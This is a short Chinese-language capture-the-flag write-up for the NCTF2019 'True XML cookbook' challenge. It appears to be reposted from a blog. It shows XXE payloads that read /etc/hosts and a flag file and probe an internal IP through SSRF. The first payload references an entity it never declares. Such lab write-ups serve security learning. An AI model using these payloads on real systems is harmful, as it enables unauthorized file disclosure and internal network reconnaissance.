[NCTF2019]True XML cookbook

爆破

抓包爆破，想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞，利用脚本直接打：
构造：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

在这里插入图片描述

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户，先查看内网存活主机：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述
看到了本机ip，但是不知道存活ip。
可以用BP爆破（但是看到wp上是说ip最后一位为11）：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述

查看全文

相关阅读:
python爬虫学习(7) —— 爬取你的AC代码
 python爬虫学习(6) —— 神器 Requests
python爬虫学习(5) —— 扒一下codeforces题面
 python爬虫学习(4) —— 手刃「URP教务系统」
听说你叫爬虫(3) —— 模拟登陆
 python爬虫学习(2) —— 爬一下ZOL壁纸
 python爬虫学习(1) —— 从urllib说起
 数据结构/ 串的模式匹配法 / kmp算法与next数组的构造
 ADWORLD web/PHP2
ADWORLD web/upload1

原文地址：https://www.cnblogs.com/shenjuxian/p/13977582.html